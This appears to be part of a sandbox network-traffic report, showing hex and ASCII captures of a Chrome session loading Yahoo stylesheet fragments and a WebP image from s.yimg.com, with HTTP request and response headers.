                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {border-left-width:112px}#atomic .Bdrs\(2px\)\:\:b::before{border-radius:2px}#atomic .Bdrs\(30px\){border-radius:30px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bdrsbend\(8px\){border-bottom-right-radius:8px}#atomic .Bdrsbstart\(8px\){border-bottom-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 69 6d 67 2f 66 69 72 65 49 63 6f 6e 46 69 6e 61 6c 5f 5f 61 6c 70 68 61 5f 62 67 2d 32 30 32 33 31 31 30 31 30 33 33 31 2e 67 69 66 27 29 29 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 42 67 63 5c 28 5c 24 73 72 63 68 46 75 6a 69 57 68 69 74 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 2c 23 66 66 66 29 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 37 65 31 66 66 66 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 65 31 66 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 73 72 63 68 46 75 6a 69 57 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .com/pv/static/img/fireIconFinal__alpha_bg-202311010331.gif'))}.active .active_Bgc\(\$srchFujiWhite\){background-color:#fff!important;background-color:var(--white,#fff)!important}#atomic .Bgc\(\#7e1fff\){background-color:#7e1fff}#atomic .Bgc\(\$srchFujiWh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 24 73 72 63 68 46 75 6a 69 42 61 74 63 61 76 65 5c 29 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 2c 23 32 33 32 61 33 31 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 73 72 63 68 46 75 6a 69 42 61 74 74 6c 65 73 68 69 70 5c 29 7b 63 6f 6c 6f 72 3a 23 35 62 36 33 36 61 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 74 6c 65 73 68 69 70 2c 23 35 62 36 33 36 61 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 73 72 63 68 46 75 6a 69 43 68 61 72 63 6f 61 6c 5c 29 7b 63 6f 6c 6f 72 3a 23 34 36 34 65 35 36 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 68 61 72 63 6f 61 6c 2c 23 34 36 34 65 35 36 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 73 72 63 68 46 75 6a 69 44 6f 6c 70 68 69 6e 5c 29 7b 63 6f 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: $srchFujiBatcave\){color:#232a31;color:var(--batcave,#232a31)}#atomic .C\(\$srchFujiBattleship\){color:#5b636a;color:var(--battleship,#5b636a)}#atomic .C\(\$srchFujiCharcoal\){color:#464e56;color:var(--charcoal,#464e56)}#atomic .C\(\$srchFujiDolphin\){col
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 62 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 30 5c 2e 36 38 37 35 72 65 6d 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 38 37 35 72 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 30 5c 2e 38 37 35 72 65 6d 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 32 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 36 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 38 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 23 61 74 6f 6d 69 63 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 00\){font-weight:700}#atomic .Fw\(b\){font-weight:700}#atomic .Fz\(0\.6875rem\){font-size:.6875rem}#atomic .Fz\(0\.875rem\){font-size:.875rem}#atomic .Fz\(12px\){font-size:12px}#atomic .Fz\(16px\){font-size:16px}#atomic .Fz\(18px\){font-size:18px}#atomic
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 30 5c 29 5c 3a 66 6f 74 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 31 36 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 34 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 38 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 39 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 68 5c 28 32 32 70 78 5c 29 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 70 78 7d 2e 66 6c 61 6d 65 54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: atomic .Mstart\(0\)\:fot:first-of-type{margin-left:0}#atomic .Mstart\(16px\){margin-left:16px}#atomic .Mstart\(4px\){margin-left:4px}#atomic .Mstart\(8px\){margin-left:8px}#atomic .Mstart\(9px\){margin-left:9px}#atomic .Mah\(22px\){max-height:22px}.flameT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 37 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 37 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 37 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 31 31 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 20 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 5f 50 74 5c 28 31 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 20 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 5f 50 74 5c 28 38 70 78 5c 29 7b 70 61 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ){padding-top:7px}#atomic .Py\(7px\){padding-bottom:7px}#atomic .Pt\(11px\){padding-top:11px}#atomic .Pt\(2px\){padding-top:2px}.wafer-tabs-target .wafer-tabs-target_Pt\(12px\){padding-top:12px!important}.wafer-tabs-target .wafer-tabs-target_Pt\(8px\){pad
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC885INData Raw: 63 20 2e 57 68 73 5c 28 6e 77 5c 29 2c 2e 45 6c 6c 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 5c 24 73 72 63 68 48 6f 6d 65 54 6e 52 6f 77 5c 29 7b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 34 70 78 29 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 30 30 5c 25 5c 29 7b 77 69 64 74 68 3a 31 30 30 25 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 31 5c 2e 32 35 70 78 5c 29 7b 77 69 64 74 68 3a 31 31 2e 32 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 31 32 70 78 5c 29 7b 77 69 64 74 68 3a 31 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 32 70 78 5c 29 7b 77 69 64 74 68 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 36 35 70 78 5c 29 7b 77 69 64 74 68 3a 31 36 35 70 78 7d 23 61 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: c .Whs\(nw\),.Ell{white-space:nowrap}#atomic .W\(\$srchHomeTnRow\){width:calc(50% - 4px)}#atomic .W\(100\%\){width:100%}#atomic .W\(11\.25px\){width:11.25px}#atomic .W\(112px\){width:112px}#atomic .W\(12px\){width:12px}#atomic .W\(165px\){width:165px}#ato


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              39192.168.2.45106087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC763OUTGET /uu/api/res/1.2/6x_jt5f8kHYIVKLC8RJf3Q--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/22383490-8588-11ef-bef3-ab14bc1f4efd.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1091INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 67394
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="22383490-8588-11ef-bef3-ab14bc1f4efd.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "e1bf63fc9cd6cb28e4f8525f7ea65821"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 15:17:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Request-Id: 54f337ea9086ebaab23f7a381c2e9903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 15:19:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=0;start=2024-10-08T15:19:21.312Z;desc=hit,rtt;dur=105,content-info;desc="width=560,height=272,bytes=67394,owidth=2800,oheight=1575,obytes=1879048,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 14053
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 54f337ea9086ebaab23f7a381c2e9903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 52 49 46 46 3a 07 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 2f 02 00 0f 01 00 49 43 43 50 0c 02 00 00 00 00 02 0c 61 70 70 6c 04 00 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 0a 00 08 00 08 00 27 00 34 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 0a d1 15 83 4f 11 66 89 7d 0c 18 4b 48 d2 f6 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 34 63 70 72 74 00 00 01 30 00 00 00 50 77 74 70 74 00 00 01 80 00 00 00 14 72 58 59 5a 00 00 01 94 00 00 00 14 67 58 59 5a 00 00 01 a8 00 00 00 14 62 58 59 5a 00 00 01 bc 00 00 00 14 72 54 52 43 00 00 01 d0 00 00 00 10 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF:WEBPVP8X /ICCPapplmntrRGB XYZ '4acspAPPLAPPL-applOf}KHdesc4cprt0PwtptrXYZgXYZbXYZrTRCc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: de 08 03 7d 42 f7 1b a3 34 60 79 90 0c 7a 21 f5 b0 64 0e 0b a7 e1 a1 10 d0 94 45 49 d5 0e 36 2e c0 b8 c8 b6 97 b5 2d 55 1a 9a 66 e9 b6 0c 67 45 1d 40 e1 e6 2c 06 ef d1 77 27 54 bf ff ed 75 a9 53 10 f5 0d e1 da c6 ee 68 c8 13 cd 2a 8a ca 52 bd f0 38 28 d5 b4 be 7a b7 14 3f e4 28 72 4f 06 e9 5c 86 96 df c5 12 88 ad a2 fb 52 8c 6b 9a 88 66 30 e6 b1 ec b0 18 77 66 4a fd 55 6b f2 d8 19 21 be c6 be ed 21 c6 20 83 94 b8 02 9b 44 d3 19 5a 88 86 9b 90 cd c7 cb b4 12 4b a0 a6 ea 01 de 83 ad 27 2c 75 71 6b 29 76 ef b4 dd 64 da b1 f8 c0 a8 08 35 79 59 e0 00 9d 3c c2 26 59 86 f7 95 95 78 7c ec 05 ff 96 cd c3 03 3b 46 7f 04 be da b8 ee 60 0c 14 40 42 0e 5f 37 d4 b1 4c 1e 3e 85 55 d9 74 7b f9 61 7f 1d b3 c9 02 39 aa dd 3e 5b 4b 25 55 94 a0 e6 55 ea ff 83 9f 32 90 79 5e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }B4`yz!dEI6.-UfgE@,w'TuSh*R8(z?(rO\Rkf0wfJUk!! DZK',uqk)vd5yY<&Yx|;F`@B_7L>Ut{a9>[K%UU2y^
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 13 9f c2 99 09 3b ca 65 1c cb e4 d2 50 d8 c5 b9 51 25 2b 95 dc 4b 0a 7c b5 6a 3f c4 b3 19 dc 3b 60 10 6e 27 18 4b 4c c1 5d 40 87 ba 22 dd 62 05 a0 9a 23 be 91 69 95 60 c6 1e 34 f5 5e 5b f8 0a 1a db 62 9a 95 84 de 95 ba 29 19 39 8a b4 d9 53 d7 65 99 38 40 bd 6d 4e 4f 73 47 68 7d f8 c9 a7 86 e1 e3 cd ef e0 b2 47 4d 15 dc 31 8a 72 53 59 17 04 9d f5 f5 08 c5 15 70 e6 fe c5 b6 e0 ff d5 4b 98 c3 a8 de d1 58 fa 76 5b f4 2a a5 4e 56 f8 90 83 f4 ef f8 e1 67 81 73 b0 87 04 69 0a 4d 60 80 74 2f dc 0c 80 c9 9d 02 c8 c3 fa 7b bb 25 1c e7 cb 8f 2a 06 bc 0b 60 87 81 f2 39 03 f3 81 91 82 12 58 52 68 9f 0d 80 b6 16 bb 1b 08 ba ef c8 fd 95 b4 4f 16 e5 b5 d5 63 79 9d 55 1b e6 b3 d6 39 6c ad 5a 2f b5 89 a4 e8 f8 8a bc 5a 33 a5 ee c3 3e e9 6f 01 fd 31 0f a3 7b fe f3 ec 7b b8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ;ePQ%+K|j?;`n'KL]@"b#i`4^[b)9Se8@mNOsGh}GM1rSYpKXv[*NVgsiM`t/{%*`9XRhOcyU9lZ/Z3>o1{{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 36 4a 0e ab ca 7b 1e ee f0 e1 59 10 1b c1 31 3d aa 64 29 2d 19 37 fd ea e5 cc 41 67 51 8d e4 e7 2a 60 6c e4 ca 44 e2 0e 2a a0 62 fd cb d2 20 20 8a 5a 63 2b 82 4d ad 72 4f f7 b6 90 5c d1 a1 50 ac 5c c6 14 43 77 bc 42 e3 50 31 a1 bc 8e 08 c2 7b 99 c6 5d 66 be 09 a5 4a 41 e8 a3 21 4c dd 8b 66 10 de 4c 6c 40 a5 01 df 7e f5 67 4f 44 c0 76 e6 8f 7b 43 d7 03 0d b9 94 b7 8a 48 4f 92 06 2e 31 86 9b 2b 19 26 d0 cf 78 f7 c3 e1 36 c5 3d 4b 3b 4e 5d 98 e0 c4 58 68 5d 4a 3c 1f b8 bf 30 46 58 71 80 da d6 f4 a7 f6 99 23 e4 8d c9 2e 56 a9 1b ac ea 2a 19 4a cf 83 ad 45 00 ab 79 18 b2 8a db 28 4d 35 66 6e ee 1c 2f de ee c7 67 d9 04 00 7e f0 12 22 e2 ba 32 f8 b2 f5 e6 02 c9 ae 37 cb c8 2c c5 12 28 1f fa fd 73 58 e5 28 9c f7 fc 4c a7 0e 81 4e 28 86 1b 60 41 db 28 1e 6c c4 8f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6J{Y1=d)-7AgQ*`lD*b Zc+MrO\P\CwBP1{]fJA!LfLl@~gODv{CHO.1+&x6=K;N]Xh]J<0FXq#.V*JEy(M5fn/g~"27,(sX(LN(`A(l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: c2 2b 2f 36 01 83 6b 57 9a af fb 5c 59 09 7c 54 ce 4d fb a3 f2 0e 09 97 67 8b cb 53 c8 29 70 e5 4c 82 f6 10 8d f2 e4 f4 bf 05 ac b0 14 1a 5f 4b fa fc dd 9c d6 2d 76 5c bc 1c 74 1c e3 b4 d5 03 1d b2 bc bf 15 fa 54 ac a9 4c c6 c4 ea 64 e6 31 59 58 57 13 aa 86 ea b6 eb 75 b6 a5 8d a8 9f 9b 09 9c 79 61 12 c7 d2 ca cf 3a cc 2a 68 d9 19 0f 96 fd 04 6d cc a9 ed 60 80 f4 00 fe ff fe 0e b8 89 46 10 9d 8e 5f d7 fd ff 06 22 ef c6 28 94 7c b0 61 7a 11 5a 37 aa ee b4 d2 b4 99 00 93 65 41 cb ee 86 b4 94 0c bd 01 46 b1 f9 f7 73 58 e9 fc 8c f3 b3 b1 f5 b9 38 ea 8c 26 d1 f7 c7 c9 77 37 30 c1 40 8a ed 04 84 ba 9a 0d c8 0a 3e 8b 49 a9 c4 69 0b 60 ff 53 92 9c 53 b1 e5 35 9c 3d 37 c5 a9 5e bf 45 4e 2b c5 9d 34 77 21 e0 b2 1d 8c 40 36 13 bc f9 1e a4 c1 4c 6d fc f5 43 7d 6e ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +/6kW\Y|TMgS)pL_K-v\tTLd1YXWuya:*hm`F_"(|azZ7eAFsX8&w70@>Ii`SS5=7^EN+4w!@6LmC}n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: e7 50 97 37 e7 e9 48 c9 f3 1d e9 51 69 30 fa f9 5c 66 db 11 b6 a1 a8 18 2b 58 cc bc 2e e5 73 9c e8 ba b5 f0 3a d7 2a a6 df f0 5e 2d 07 17 06 cb 3f c9 4d 6c 1c c1 12 e4 8a 14 03 d9 1a 4c b3 4e b2 d5 c1 a3 21 a8 4f 66 f0 2c 0b dc 7d 7d 8f 85 de ad 8a 99 5d 1a ed 94 3a db 4b 58 af ac 24 ef bb f1 fc 25 af c4 65 43 89 e4 2a 05 bb 9b b8 6f 86 8c ad 68 eb 2e 4e c5 05 7d 66 11 83 ca 42 f8 bd d2 50 29 4d 05 2e d3 84 09 a9 f8 4c bf 82 6d f2 e6 9c a7 ea 7d 56 f4 d5 56 16 1e a6 6e 50 de 97 15 e3 d1 c0 d3 bb 67 ce 3c bc f8 c0 03 c2 66 85 09 ed 89 58 04 19 a3 dd b5 ec 2c 27 eb 18 4f cb 83 90 59 ae 18 11 ae 18 76 77 70 55 ca 6d ce 0b a7 33 c9 4c b9 e5 3b 15 7a a9 b8 25 23 70 5e 29 0f ff d5 73 eb 33 b0 f6 8e 3a 39 37 33 f3 7d 6f 60 fb e0 a4 75 48 6c 70 44 62 07 d0 f0 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: P7HQi0\f+X.s:*^-?MlLN!Of,}}]:KX$%eC*oh.N}fBP)M.Lm}VVnPg<fX,'OYvwpUm3L;z%#p^)s3:973}o`uHlpDbA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 7d ce a4 ad f4 23 b9 83 88 a9 ee 61 00 1b f7 4a c0 9b 27 56 c7 a3 79 d2 98 48 04 33 64 a1 02 06 a0 0f 2c 2c 23 51 7e f6 3c 73 5c da 1d 29 8d c1 b4 40 34 d8 7f 50 00 26 c7 6d 5a ef 8a b2 11 0d 4c b5 cd dd 00 83 19 0e 08 61 98 72 f7 ad 0e 44 d1 73 cb 9c 5f 34 7b 94 bc 54 b0 5b 4f 91 ed f4 d6 6a 22 8b 11 ba 28 7c 70 a8 e5 4a 47 11 c2 6f f6 2b 39 17 9e fa d1 3e b4 03 d5 5f a1 aa 22 e7 dd b5 87 61 d3 f5 e6 26 85 f4 51 17 14 1a 99 22 c0 6d 14 75 74 65 38 83 01 9c 9e 3f f3 05 a0 91 a7 54 87 01 d6 03 75 ee 6c c0 16 87 32 27 64 86 a6 dd ee 27 7e 51 93 3e 78 61 ef e4 ac a2 95 c0 7d 4f aa 9d 8d 4f 63 1c 53 fb 8b 70 16 be b4 0f 19 b5 7b cc 77 40 61 b4 7d 0b c9 7b ee d6 1f 49 a7 25 b2 59 6d 4d 90 32 34 b7 e2 e9 af 40 4b eb 45 eb 2f 15 32 be bb bc 46 6e 2b df 23 67 9a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }#aJ'VyH3d,,#Q~<s\)@4P&mZLarDs_4{T[Oj"(|pJGo+9>_"a&Q"mute8?Tul2'd'~Q>xa}OOcSp{w@a}{I%YmM24@KE/2Fn+#g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 70 5f 4d b5 c9 36 05 91 5e d5 a8 96 8e d4 08 33 6f cd ff d8 17 f9 47 2a 36 c4 d4 8f a2 34 20 e0 d1 d0 57 aa 14 dc 33 78 ec e2 cd 52 d4 c8 a1 4b 7d 81 df d2 3e 14 f4 29 74 39 43 aa 05 40 8e d4 86 de 59 11 78 e6 17 14 35 89 cc 5b 4e ef 62 51 77 82 21 9f 86 27 8b e7 e4 4f 74 a9 65 a4 2c 47 eb e9 c1 55 d2 f2 11 cd 3c a0 b0 e6 8a a4 fe cc d1 de 1b 5d fc 8a fe 54 73 66 7c 77 12 57 20 44 69 bb ee 51 15 b4 c4 84 e3 15 c8 93 a8 48 a0 96 fe d2 ca 48 5d 20 19 db fe 78 10 d8 54 eb 29 c9 6d df 12 50 6d 22 21 ec 1c 22 46 2c 55 12 8c be d7 22 55 5b 1b c4 80 9b 76 e0 b0 f6 b3 3d 66 61 5f 95 56 37 17 44 a2 43 5a da d6 95 90 ba 7c a7 1e 7a 6f aa b3 72 9d 1b d4 cc 30 9d 59 d8 de 06 b9 63 ba d9 78 74 a0 06 70 5f a7 1e 4a 22 90 66 c3 56 62 88 2b 63 d7 9e 62 a6 8c f8 82 92 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: p_M6^3oG*64 W3xRK}>)t9C@Yx5[NbQw!'Ote,GU<]Tsf|wW DiQHH] xT)mPm"!"F,U"U[v=fa_V7DCZ|zor0Ycxtp_J"fVb+cb}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 15 15 f5 99 93 62 09 63 d9 3d 14 39 38 ac c1 5b 42 cb da 14 ef 81 94 23 6d c1 e7 14 2a 00 56 83 ad 31 d8 ef 1a 7d e7 52 45 47 36 a9 d0 3e eb 61 7a b8 b6 f2 e6 82 4b 45 a6 40 8b 90 89 05 c4 9c fa d0 c4 76 bd da 80 6c 78 c1 f1 91 bc f5 82 95 8f bb ef 3d fb 04 d1 2a d4 07 b5 08 2c a9 23 bb 21 a3 4d 40 29 59 53 3b 38 cd b8 f1 da 58 18 a4 da 25 f1 e3 a9 5b 1e 74 0e 6e 53 b7 27 9a 9b 17 08 40 ad de ca 22 50 3e ff 31 57 75 de 0a a3 a9 57 4e 61 e9 83 aa 00 a4 c8 ae 59 4f de d9 66 97 3b 7f 4c 61 e2 80 a2 83 6a b0 4e 03 27 71 44 44 f0 56 54 b1 94 30 ea b5 fd 3e ef 16 4d a1 79 8a 7e 30 d7 59 06 ad 2e 6f 43 7f 6c f3 ae 4e 3d 40 bb 42 3b 0d 3a 2a 7a fc 29 43 85 bc 5e 60 5d d1 c0 06 e3 63 b3 65 8e 45 24 7b 92 8c 37 2c 89 59 f3 b0 a1 92 6f e3 eb 2f 7d 28 93 30 c9 ce c4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: bc=98[B#m*V1}REG6>azKE@vlx=*,#!M@)YS;8X%[tnS'@"P>1WuWNaYOf;LajN'qDDVT0>My~0Y.oClN=@B;:*z)C^`]ceE${7,Yo/}(0
